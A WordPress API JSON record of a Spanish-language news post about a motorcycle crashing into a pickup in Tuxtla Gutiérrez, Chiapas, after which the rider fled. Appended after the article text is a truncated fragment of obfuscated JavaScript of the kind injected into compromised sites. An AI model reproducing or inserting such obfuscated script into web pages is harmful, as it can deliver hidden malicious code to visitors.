{"id":15688,"date":"2024-05-20T01:09:00","date_gmt":"2024-05-20T01:09:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15688"},"modified":"2024-05-20T01:09:01","modified_gmt":"2024-05-20T01:09:01","slug":"motociclista-se-estrello-contra-una-camioneta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15688","title":{"rendered":"Motociclista se estrell\u00f3 contra una camioneta"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15689\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716167227029-1024x768.jpg\" alt=\"\" class=\"wp-image-15689\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716167227029-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716167227029-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716167227029-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716167227029.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15690\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716167230285-1024x576.jpg\" alt=\"\" class=\"wp-image-15690\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716167230285-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716167230285-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716167230285-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716167230285.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 19 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este s\u00e1bado por la noche un acelerado motociclista se estrell\u00f3 contra una camioneta cuando circulaba sobre el Bulevar \u00c1ngel Albino Corzo, a la altura del Fraccionamiento Montserrat de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, el conductor de una motocicleta Vento con placas de Oaxaca, se estrell\u00f3 por alcance contra una Honda HRV de color rojo, cuando circulaba de Poniente a Oriente.<\/p>\n\n\n\n<p>Por el golpe el motociclista sali\u00f3 volando y se estrell\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>Sin embargo, pasaron unos minutos se recuper\u00f3 y escap\u00f3 del lugar, dejando abandonada la moto.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito municipal para tomar conocimiento del hecho, y ordenar que las unidades fueran remolcadas a un corral\u00f3n en turno para iniciar las investigaciones correspondientes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 19 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este s\u00e1bado por la noche un acelerado motociclista se estrell\u00f3 contra una camioneta cuando circulaba sobre el Bulevar \u00c1ngel Albino Corzo, a la altura del Fraccionamiento Montserrat de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, el conductor de una motocicleta Vento con placas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15689,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15688","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15688","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15688"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15688\/revisions"}],"predecessor-version":[{"id":15691,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15688\/revisions\/15691"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15689"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15688"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15688"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15688"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}